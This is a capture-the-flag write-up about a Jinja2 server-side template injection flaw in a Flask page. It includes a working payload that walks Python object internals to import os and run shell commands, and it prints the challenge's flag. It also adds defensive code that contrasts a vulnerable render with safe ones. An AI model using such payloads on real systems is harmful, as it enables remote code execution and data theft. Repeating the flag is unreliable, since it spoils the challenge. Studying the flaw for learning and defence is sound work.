0x00 preface
I had just finished the first challenge and immediately opened the second one.
Tip: Can you exploit this simple mistake?
0x01 visit website
The page shows "Proudly powered by Flask/Jinja2", so the first guess is an SSTI vulnerability.
First, find the injection point based on past experience.
0x02 injection point
Try a payload in the URL:
?={{3*3}}
The expression is evaluated rather than echoed back, which confirms the SSTI vulnerability and locates the injection point.
0x03 exploit
Here we use Python's magic methods. __class__ returns the class of an object; __mro__ returns the classes it inherits from, and since every object inherits from object, this reaches the object class; __subclasses__() then lists the subclasses of object. In the namespace of the subclass <class 'warnings.catch_warnings'> we find __builtins__, and finally its __import__ function imports the os library to execute arbitrary commands. The final payload is as follows.
{{ "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read() }}
flag:HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}
0x04 summary
SSTI generation principle
After the server receives malicious input from the user, it uses it as part of the web application's template content without any processing. During compilation and rendering, the template engine then executes the statements the user inserted, which can lead to problems such as sensitive information disclosure, code execution and GetShell. Simple string splicing does not in itself cause injection; the key is what gets spliced in. If it is a control statement, the boundary between the data field and the code field is lost, and that is where the problems come from.
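As an added example (not code from the writeup), the bug class behind the challenge shown as a Jinja2 render that splices user input into the template source, beside the fixed form that passes the input as data; it assumes only the jinja2 package, the same engine Flask uses underneath.

```python
# Added example, not code from the writeup: the bug class behind the challenge,
# a Jinja2 render that splices user input into the template source, beside the
# fixed form. Flask's render_template_string() is a thin wrapper over Jinja2,
# so Jinja2 is used directly here to keep the example self-contained.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = Environment(autoescape=True)  # Flask autoescapes render_template_string()
sandbox = SandboxedEnvironment(autoescape=True)

# Constructed probe: the same 3*3 expression the writeup uses to confirm SSTI.
PROBE = "{{3*3}}"


def render_vulnerable(user_input: str) -> str:
    # Untrusted input becomes part of the template SOURCE, so Jinja2 parses any
    # {{ }} / {% %} it contains as code. Same shape as
    #   render_template_string("Hello " + request.args["name"])
    return env.from_string("Hello " + user_input).render()


def render_fixed(user_input: str) -> str:
    # The template source is a constant; user input arrives as a context
    # variable, is only ever treated as data, and is HTML-escaped on output.
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(user_input: str) -> str:
    # Defence in depth where templates genuinely must come from users: the
    # sandbox still evaluates expressions but refuses underscore attributes.
    return sandbox.from_string("Hello " + user_input).render()


def is_injectable(render) -> bool:
    # Regression check: injectable if the probe is evaluated, not echoed back.
    return render(PROBE) == "Hello 9"


def walks_object_graph(render) -> bool:
    # Can the template reach the object graph via __class__/__mro__, the first
    # hop of the writeup's chain? The sandbox raises SecurityError there.
    try:
        out = render('{{ "".__class__.__mro__ }}')
    except SecurityError:
        return False
    return "object" in out
```

Note that the sandbox alone still evaluates the 3*3 probe: it limits what a template can reach, but only keeping user input out of the template source removes the injection.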
SSTI attack ideas
We know that SSTI can cause many harms, including sensitive information disclosure, RCE and GetShell. The key is how to use the injection point to execute the code we want, so the search for exploitable points falls into the four areas above: first, the syntax, built-in variables, attributes and functions supported by the template engine itself; second, the global variables, attributes and functions provided by the framework; third, the characteristics of the language itself, such as its object-oriented introspection mechanism; and last, only when nothing else works, things defined by the application itself, since these are hardly documented and are designed by the developer, so we generally need the application's source code before we can consider them.